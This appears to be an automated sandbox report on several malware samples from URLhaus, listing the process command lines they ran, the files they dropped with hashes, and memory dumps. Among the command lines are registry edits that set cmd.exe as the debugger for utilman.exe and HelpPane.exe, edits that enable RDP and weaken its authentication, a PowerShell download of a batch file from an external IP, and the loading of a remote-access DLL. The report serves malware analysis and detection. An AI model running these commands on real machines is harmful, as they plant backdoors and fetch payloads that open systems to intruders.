"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff81223cb8,0x7fff81223cc8,0x7fff81223cd8

C:\Windows\system32\reg.exe

reg query HKEY_CLASSES_ROOT\http\shell\open\command

C:\Windows\system32\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"

C:\Windows\system32\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2000,2441838263140208318,12544329789927902751,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2012 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2000,2441838263140208318,12544329789927902751,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2000,2441838263140208318,12544329789927902751,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2444 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2000,2441838263140208318,12544329789927902751,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2000,2441838263140208318,12544329789927902751,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2000,2441838263140208318,12544329789927902751,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3744 /prefetch:1

C:\Users\Admin\Downloads\UrlHausFiles\test.exe

"C:\Users\Admin\Downloads\UrlHausFiles\test.exe"

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v fDenyTSConnections /t REG_DWORD /d "00000000"

C:\Users\Admin\Downloads\UrlHausFiles\V1.1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\V1.1.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2000,2441838263140208318,12544329789927902751,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2004 /prefetch:2

C:\Users\Admin\Downloads\UrlHausFiles\ew.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ew.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2000,2441838263140208318,12544329789927902751,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2732 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2000,2441838263140208318,12544329789927902751,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2708 /prefetch:1

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v fAllowUnsolicited /t REG_DWORD /d "00000001"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2000,2441838263140208318,12544329789927902751,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4904 /prefetch:2

C:\Windows\AppCompat\Programs\360.exe

C:\Windows\AppCompat\Programs\360.exe

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v UserAuthentication /t REG_DWORD /d "00000000"

C:\Windows\AppCompat\Programs\360Srv.exe

C:\Windows\AppCompat\Programs\360Srv.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5948 -ip 5948

C:\Users\Admin\Downloads\UrlHausFiles\xxx.exe

"C:\Users\Admin\Downloads\UrlHausFiles\xxx.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2000,2441838263140208318,12544329789927902751,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2380 /prefetch:2

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5948 -s 316

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/

C:\Windows\SYSTEM32\rundll32.exe

rundll32.exe "C:\ProgramData\AMMYY\aa_nts.dll",run

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff81223cb8,0x7fff81223cc8,0x7fff81223cd8

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /f /v SecurityLayer /t REG_DWORD /d "00000001"

C:\Users\Admin\Downloads\UrlHausFiles\InstallSetup.exe

"C:\Users\Admin\Downloads\UrlHausFiles\InstallSetup.exe"

C:\Windows\system32\attrib.exe

attrib +s +h d:\net

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,7003340511369147430,16570635516799937,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2220 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2208,7003340511369147430,16570635516799937,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,7003340511369147430,16570635516799937,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7003340511369147430,16570635516799937,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7003340511369147430,16570635516799937,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7003340511369147430,16570635516799937,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3944 /prefetch:1

C:\Users\Admin\Downloads\UrlHausFiles\file.exe

"C:\Users\Admin\Downloads\UrlHausFiles\file.exe"

C:\Windows\SYSTEM32\wscript.exe

"wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

Network


Files

SHA256 06a5989061aac0564c43d883c74dc603f4489e149e04142d1bb7074b7e661bd1
SHA512 5fb878c7875c6f38664bf56389d432883933b2ff956fd9fa7475da7926c4289c738ff7a1fb8a244d5e69f485b9520f678fff90ae6673a9c15a4de50a20518f54

memory/3820-533-0x0000000000400000-0x0000000000459000-memory.dmp

memory/3820-532-0x0000000000400000-0x0000000000459000-memory.dmp

memory/1848-535-0x0000000000CC0000-0x0000000000CE0000-memory.dmp

memory/1960-536-0x00000000087F0000-0x0000000008A22000-memory.dmp

memory/1960-543-0x0000000005490000-0x000000000552C000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe

MD5 3bd08acd4079d75290eb1fb0c34ff700
SHA1 84d4d570c228271f14e42bbb96702330cc8c8c2d
SHA256 4d3d060d8ec7089acfb4ba233d6f2a00a910503be648709a97714c84a80cccd8
SHA512 42309b28e5bf15ee9a4708ffcdb18ef2925d4b51151dab75168d3578db538b658c706cd77bfceae9a927516d3fb4b4bd3356e0ee066af5aaeadaa00ecff9a760

memory/3888-545-0x0000000000400000-0x000000000042B000-memory.dmp

memory/1960-548-0x0000000008FD0000-0x0000000009576000-memory.dmp

memory/1960-553-0x0000000008AC0000-0x0000000008B52000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\xblkpfZ8Y4.exe

MD5 45fe36d03ea2a066f6dd061c0f11f829
SHA1 6e45a340c41c62cd51c5e6f3b024a73c7ac85f88
SHA256 832640671878e0d9a061d97288ffaae303ba3b4858ed5d675c2170e7770ec8a6
SHA512 c8676bd022fae62a2c03932dd874da8482168698fc99987c8d724b5302f75131839b5b3b6f8288b823c5bb732918f6bc49c377116bb78825807de45b6a10026f

memory/1960-561-0x0000000008A40000-0x0000000008A4A000-memory.dmp

memory/1960-563-0x0000000008C60000-0x0000000008CB6000-memory.dmp

memory/2696-568-0x00007FF7BCE50000-0x00007FF7BDAA0000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\Aa_v3.exe

MD5 121e1634bf18768802427f0a13f039a9
SHA1 8868654ba10fb4c9a7bd882d1f947f4fd51e988e
SHA256 5fc600351bade74c2791fc526bca6bb606355cc65e5253f7f791254db58ee7fa
SHA512 393df326af3109fe701b579b73f42f7a9b155bb4df6ea7049ad3ae9fdd03446576b887a99eb7a0d59949a7a63367e223253448b6f1a0ebeaf358fa2873dcc200

memory/2696-588-0x0000020DDF700000-0x0000020DDF720000-memory.dmp

memory/4528-598-0x0000000000400000-0x000000000066D000-memory.dmp

memory/2984-597-0x0000000074790000-0x0000000074D41000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\MJPVgHw.exe

MD5 031377e4e34dcd19917fac02ff6da79f
SHA1 0fcccffee83cbb77a87ca1b55abc8e18fb267afc
SHA256 d58061a43df6b63e97421904c066ed5ad4b87a3733c250e105e83bc7154d9414
SHA512 f682a314a74dad1269dc1d948dc0c4773eb08e76ab364c3d5a9893577395126e5a409fca18cab24378e95fa71b8d96e20ad22e644275daf3f997edf8592da5c4

memory/1088-617-0x00007FF6EBAF0000-0x00007FF6EBAFA000-memory.dmp

memory/1088-611-0x00007FF6EBAF0000-0x00007FF6EBAFA000-memory.dmp

memory/1728-624-0x00007FF7F42B0000-0x00007FF7F42BA000-memory.dmp

memory/1728-625-0x00007FF7F42B0000-0x00007FF7F42BA000-memory.dmp

memory/1960-632-0x0000000009CB0000-0x000000000A007000-memory.dmp

memory/1960-633-0x000000000B7E0000-0x000000000B8AE000-memory.dmp

memory/1800-631-0x00007FF6159E0000-0x00007FF6159EA000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\22.exe

MD5 3126725f67989c5f249c4c2bd1da2c64
SHA1 2fa7be1edc151e2db8ad6b0dd564f1ab66bc66c1
SHA256 0f504cead80baca0c4be82bd9342de07b0757b4c6e88e4554d867fd1249ac2f5
SHA512 18784922ed97b7db46907045cfca669eee1c21237cc21eed39c5b1f78dc791900fc3a5fbc1415cc3a8ee5595f7997e2d977cfddb205f602e4dd6fafebe6281c0

C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe

MD5 759f5a6e3daa4972d43bd4a5edbdeb11
SHA1 36f2ac66b894e4a695f983f3214aace56ffbe2ba
SHA256 2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d
SHA512 f97c793e1489e09dc6867bc9fb8a8e6073e08e1019b7a6fd57efdb31099047fcef9bc7bc3a8194742d7998f075c50e5d71670711bf077da1ac801aab7d19b385

C:\Users\Admin\Downloads\UrlHausFiles\ammyadmin.exe

MD5 90aadf2247149996ae443e2c82af3730
SHA1 050b7eba825412b24e3f02d76d7da5ae97e10502
SHA256 ee573647477339784dcef81024de1be1762833a20e5cc2b89a93e47d05b86b6a
SHA512 eec32bb82b230dd309c29712e72d4469250e651449e127479d178eddbafd5a46ec8048a753bc2c1a0fdf1dc3ed72a9453ca66fb49cbf0f95a12704e5427182be

C:\Users\Admin\Downloads\UrlHausFiles\Photo.scr

MD5 aba2d86ed17f587eb6d57e6c75f64f05
SHA1 aeccba64f4dd19033ac2226b4445faac05c88b76
SHA256 807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d
SHA512 c3f276820d6b2872c98fa36c7b62f236f9f2650b344a243a30dcda9ca08726f6ce27c5c380b4256a1a7d8d4309e1f2f270f10bad18099a8c9e1835925ea51806

C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe

MD5 2fcfe990de818ff742c6723b8c6e0d33
SHA1 9d42cce564dcfa27b2c99450f54ba36d4b6eecaf
SHA256 cb731802d3cd29da2c01ffbb8c8ed4ef7de9d91c133b69b974583bede6bfd740
SHA512 4f20a27817de94a07071960abe0123277c0607a26de709e2ade201597df71d8c2eec7da353efba94dc6a8369b89db4caeaf9505d02b90dc30c37010a885c3613

memory/428-679-0x0000000000730000-0x0000000000A54000-memory.dmp

memory/3264-681-0x0000000003060000-0x00000000030A8000-memory.dmp

memory/2984-684-0x0000000074790000-0x0000000074D41000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\key.exe

MD5 4cdc368d9d4685c5800293f68703c3d0
SHA1 14ef59b435d63ee5fdabfb1016663a364e3a54da
SHA256 12fb50931a167e6e00e3eb430f6a8406e80a7649f14b1265247b56416ac919b0
SHA512 c8f9d2ba84603384b084f562c731609f9b7006237f2c58b5db9efdfc456932b23e2582f98fb1eb87e28363dc8d9ae4c0a950c9482685bb22604c66a1e6d611de

memory/3264-699-0x0000000006420000-0x0000000006476000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\av_downloader.exe

MD5 8af4f985862c71682e796dcc912f27dc
SHA1 7f83117abfeff070d41d8144cf1dfe3af8607d27
SHA256 d925204430ffab51ffbbb9dc90bc224b04f0c2196769850695512245a886be06
SHA512 3d4fcd9755dc4ea005fcd46e78426c5f71b50873c5174a69abcdff41a2e0405c87a36137c0c2409abedadb0ecdf622cbfd2fa1b59a2e06c81cef68d7c6c663b7

memory/2984-709-0x0000000074790000-0x0000000074D41000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\file.exe

MD5 f7f61ffb8e1f1e272bdf4d326086e760
SHA1 452117f31370a5585d8615fc42bc31fdbe32a348
SHA256 e98ae7f96f7cee07ef93b3c98ccae81c66b29e4ede046112e200bf7c152fa9af
SHA512 158fe3a916f761d766acb75da048b6e224a18d8aadde24af238e6c94be117ff2639463cb4b78c8642a3980d1b9e130741023a848853bca135e8f1fcba481305f

C:\Users\Admin\Downloads\UrlHausFiles\ipscan221.exe

MD5 6c1bcf0b1297689c8c4c12cc70996a75
SHA1 9d99a2446aa54f00af0b049f54afa52617a6a473
SHA256 40dc213fe4551740e12cac575a9880753a9dacd510533f31bd7f635e743a7605
SHA512 7edf53adf8db463658aa4a966cf9e22bf28583cb0ca4317af19e90d85232b6cb627e810033155383948d36ad6a1a14f32b3381d10c7cd6c4bd0482c974c129db

memory/3076-739-0x0000000000400000-0x000000000044B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\C18B.tmp.x.exe

MD5 97eb7baa28471ec31e5373fcd7b8c880
SHA1 397efcd2fae0589e9e29fc2153ffb18a86a9b709
SHA256 9053b6bbaf941a840a7af09753889873e51f9b15507990979537b6c982d618cb
SHA512 323389357a9ffc5e96f5d6ef78ceb2ec5c62e4dcc1e868524b4188aff2497810ad16de84e498a3e49640ad0d58eadf2ba9c6ec24e512aa64d319331f003d7ced

memory/4088-756-0x0000000000F60000-0x0000000000FB2000-memory.dmp

memory/4676-758-0x0000000000400000-0x000000000047D000-memory.dmp

memory/4088-759-0x0000000006A90000-0x00000000070A8000-memory.dmp

memory/4088-761-0x0000000005D10000-0x0000000005E1A000-memory.dmp

memory/4088-765-0x0000000005C40000-0x0000000005C7C000-memory.dmp

memory/4088-764-0x0000000005BB0000-0x0000000005BC2000-memory.dmp

memory/4088-766-0x0000000005C80000-0x0000000005CCC000-memory.dmp

memory/3888-776-0x0000000000400000-0x000000000042B000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe

MD5 6f154cc5f643cc4228adf17d1ff32d42
SHA1 10efef62da024189beb4cd451d3429439729675b
SHA256 bf901de5b54a593b3d90a2bcfdf0a963ba52381f542bf33299bdfcc3b5b2afff
SHA512 050fc8a9a852d87f22296be8fe4067d6fabefc2dec408da3684a0deb31983617e8ba42494d3dbe75207d0810dec7ae1238b17b23ed71668cc099a31e1f6539d1

memory/3008-780-0x0000000000660000-0x0000000000984000-memory.dmp

memory/2696-783-0x00007FF7BCE50000-0x00007FF7BDAA0000-memory.dmp

memory/2696-788-0x00007FF7BCE50000-0x00007FF7BDAA0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bwwdveli.3qn.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5040-800-0x0000024641C60000-0x0000024641C82000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

MD5 8911e8d889f59b52df80729faac2c99c
SHA1 31b87d601a3c5c518d82abb8324a53fe8fe89ea1
SHA256 8d0c2f35092d606d015bd250b534b670857b0dba8004a4e7588482dd257c9342
SHA512 029fd7b8b8b03a174cdc1c52d12e4cf925161d6201bbe14888147a396cd0ba463fd586d49daf90ec00e88d75d290abfeb0bb7482816b8a746e9c5ce58e464bcf

memory/752-814-0x00007FF758F00000-0x00007FF758F7D000-memory.dmp

memory/1088-811-0x00007FF6EBAF0000-0x00007FF6EBAFA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\D92B.tmp.zx.exe

MD5 4edcaedbf0e3ea4480e56d161f595e8c
SHA1 e46818f6e463d5c7d05e900470d4565c482ca8e2
SHA256 f3e87137e58e1f3878ed311b719fe1e4d539a91327a800baf9640543e13a8425
SHA512 3ab0c1d41a24cd7be17623acbdae3dd2f0d0fd7838e6cb41fe7427bca6a508157e783b3d8c9717faa18f6341431226719ee90fa5778626ce006f48871b565227

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

MD5 5e29a1fb83113320f38278bc60fab3d0
SHA1 d0d1317751bac9e8ad70fcd2d637a7debba204db
SHA256 f9e3a8f71f48f995134f7f26ffd3fd6c84d70b719c1373b07faf70c9c160a5f4
SHA512 327dd8a82bf9f42e0363918915b01ed2d81b8ba795dc27e41963312551b4bf581980ca6a55f6d7676473ef4714c053eee28614dd79f105d53e762f4797d09b73

memory/5940-902-0x00007FF6A80C0000-0x00007FF6A82F5000-memory.dmp

memory/5940-899-0x00007FF6A80C0000-0x00007FF6A82F5000-memory.dmp

memory/5940-904-0x00007FF6A80C0000-0x00007FF6A82F5000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\random.exe

MD5 fb7784fed6723631ba38992872d9da6a
SHA1 30bd4ede876d994a45507cc8ff582af5683ca183
SHA256 90a1c059e5992791e0b94da3098816346c8bd33b724039e0a4ff1a7623d5865a
SHA512 27944b86bb862055021d96d3ada0a45657c04134b7424b8156ec20b15bb75267885fd8546619781e18a43a3758e2a1fa1e3614da9596d47b2a1cf8498d106cec

memory/4088-909-0x00000000065E0000-0x0000000006646000-memory.dmp

memory/3076-911-0x0000000000400000-0x000000000044B000-memory.dmp

memory/4088-921-0x0000000007400000-0x0000000007450000-memory.dmp

memory/2696-927-0x00007FF7BCE50000-0x00007FF7BDAA0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 c03d23a8155753f5a936bd7195e475bc
SHA1 cdf47f410a3ec000e84be83a3216b54331679d63
SHA256 6f5f7996d9b0e131dc2fec84859b7a8597c11a67dd41bdb5a5ef21a46e1ae0ca
SHA512 6ea9a631b454d7e795ec6161e08dbe388699012dbbc9c8cfdf73175a0ecd51204d45cf28a6f1706c8d5f1780666d95e46e4bc27752da9a9d289304f1d97c2f41

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 3d68c7edc2a288ee58e6629398bb9f7c
SHA1 6c1909dea9321c55cae38b8f16bd9d67822e2e51
SHA256 dfd733ed3cf4fb59f2041f82fdf676973783ffa75b9acca095609c7d4f73587b
SHA512 0eda66a07ec4cdb46b0f27d6c8cc157415d803af610b7430adac19547e121f380b9c6a2840f90fe49eaea9b48fa16079d93833c2bcf4b85e3c401d90d464ad2f

C:\Users\Admin\Downloads\UrlHausFiles\test.exe

MD5 8dc615a726d1e47c1bbda80d36de8eb4
SHA1 c37198624c15c5a541fce60a164ee0f957b9c269
SHA256 e00aa3c4c4c619fc05fc7deec32ca06959076b3df1063fd2da4205cca4882a94
SHA512 ab52c58de0e7242f78165450498b64e610c36bfc63cb302b33d0400100ae3cd12b444a7b6ed708e0f11bb8b46b5c4d4147ab0ba1ccc5b3633549b65a12146031

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 03766e07405a29d6cd6d67fce20afeec
SHA1 5ec22c8c3f915187b33cf42ecabb216196470970
SHA256 c00344a16e9aa0d0f53e2338437536929648025b7f4463c9423690e1474a50e5
SHA512 7cf58c7f54e60b952ff1ac4ea6bc9d4f0f8bdabfd91ed00caedc6520aa21b58248cb94f9f220da3297958a1db81b59ead32875f476b29f70a12067e8825e3804

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 1b269c9e02110f42d50e20ca269af800
SHA1 0389a428b0328e4ec57c4a2777743459d7410504
SHA256 edc5d983fe5d20d1d2fd0823bfa0f325824fa44cd2e73b032965b7300823e61e
SHA512 3144a7057a5d5a75db29b8c50d098b394a1ceb372d7e97a0a950a608a5f1f3eb858cbe01c79e4a0b8a247ebf4a2f0c2a369a7a38b711ac65f0c6cf885396ec0f

memory/1992-978-0x0000000000ED0000-0x0000000001030000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\V1.1.exe

MD5 7b1d21282a65bac0410541f7466c7038
SHA1 9a1010aba1b23ba1e118c8cd29fff8ecd39431d9
SHA256 e465f41c82dcc8e91aa580b348064196c696a6b76b28ee82d5e194ca2261e49e
SHA512 5a5c4896af0095067e88e0b0d844115df59cc9b25d01d8ee541e88666c15448d1d3dd2dd7796a438616db10016e84450ebd1fd2441b47277f74a3098ed2629c3

